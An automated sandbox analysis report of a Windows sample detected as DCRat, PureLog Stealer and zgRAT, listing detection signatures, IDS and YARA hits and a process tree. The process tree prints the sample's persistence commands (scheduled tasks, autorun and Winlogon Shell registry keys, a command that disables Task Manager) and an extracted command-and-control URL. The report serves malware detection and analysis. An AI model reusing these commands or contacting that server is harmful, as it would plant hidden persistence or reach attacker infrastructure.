Edit tour

Windows Analysis Report
kJrNOFEGbQ.exe

Overview

General Information

Sample name:	kJrNOFEGbQ.exe renamed because original name is a hash value
Original sample name:	36bbafbd00e62a37070764eb4ed93308.exe
Analysis ID:	1583905
MD5:	36bbafbd00e62a37070764eb4ed93308
SHA1:	40acb7b8fec8d6d8e0d0a9310c511a35d0b34c27
SHA256:	7fbf15fc103c368c639ba11695315909b1dbd9361e83cf48fb2177cc8ff060e2
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

kJrNOFEGbQ.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\kJrNOFEGbQ.exe" MD5: 36BBAFBD00E62A37070764EB4ED93308)

wscript.exe (PID: 7580 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8008 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

Mscommon.exe (PID: 8024 cmdline: "C:\hyperComponentFontDhcp/Mscommon.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7180 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 7228 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7324 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 3848 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5312 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4936 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1908 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4192 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3732 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1880 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3340 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5580 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4564 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5592 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3864 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7304 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7452 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 5252 cmdline: "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 7572 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 7548 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 7576 cmdline: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe MD5: C47F34E03D2A705E84CCB97C250966F2)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 3868 cmdline: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 7808 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 7096 cmdline: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 7200 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 7960 cmdline: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 1244 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 7280 cmdline: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cmd.exe (PID: 1436 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
kJrNOFEGbQ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
kJrNOFEGbQ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\hyperComponentFontDhcp\Mscommon.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\hyperComponentFontDhcp\Mscommon.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\SoftwareDistribution\cmd.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\SoftwareDistribution\cmd.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Mscommon.exe PID: 8024	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: cmd.exe PID: 7548	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.0.Mscommon.exe.5c0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
8.0.Mscommon.exe.5c0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7228, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, ProcessId: 8184, ProcessName: schtasks.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ruRRsbcJNKBbiFjvLZZICNpuYz

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\SoftwareDistribution\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\SoftwareDistribution\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", ProcessId: 7228, ProcessName: csc.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, CommandLine: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, ProcessId: 3848, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kJrNOFEGbQ.exe", ParentImage: C:\Users\user\Desktop\kJrNOFEGbQ.exe, ParentProcessId: 7536, ParentProcessName: kJrNOFEGbQ.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , ProcessId: 7580, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", ProcessId: 7228, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T20:47:39.900911+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49736	193.58.121.137	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kJrNOFEGbQ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\AEzAQzJw.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\RrReMzQm.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\QCZpVjcx.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\WGSwrSeE.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\CXEIeahW.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\RTAxOVPQ.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	ReversingLabs: Detection: 82%
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	ReversingLabs: Detection: 82%
